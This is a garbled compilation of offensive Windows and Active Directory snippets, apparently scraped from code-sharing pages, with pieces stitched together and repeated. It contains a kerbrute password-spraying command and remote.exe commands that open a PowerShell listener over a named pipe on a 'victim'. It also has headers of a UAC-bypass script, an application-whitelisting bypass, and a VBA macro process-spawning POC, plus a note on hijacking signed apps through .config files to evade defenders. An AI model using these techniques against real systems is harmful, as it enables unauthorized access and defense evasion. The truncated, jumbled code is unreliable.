With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# Command to run on the victim | |
# This will establish a PowerShell listener over the "pwnme" named pipe | |
remote /S "powershell.exe" pwnme | |
# Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
remote /C [Hostname\IP] "pwnme" |
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
/* |
Import-Module NtObjectManager | |
<# | |
Function to kill all processes which are using a locked file. | |
#> | |
function Kill-FileLocker { | |
param( | |
[Parameter(Mandatory)] | |
[string]$Path | |
) |
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
# These keyword values can be obtained with: logman query providers Microsoft-Windows-Kernel-Registry | |
[Flags()] | |
enum RegistryOptions { | |
CloseKey = 0x00000001 | |
QuerySecurityKey = 0x00000002 | |
SetSecurityKey = 0x00000004 | |
EnumerateValueKey = 0x00000010 | |
QueryMultipleValueKey = 0x00000020 | |
SetInformationKey = 0x00000040 | |
FlushKey = 0x00000080 |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
' by @_xpn_ | |
' | |
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
Const HEAP_ZERO_MEMORY = &H8& | |
Const SW_HIDE = &H0& | |
Const MAX_PATH = 260 | |
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007 |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |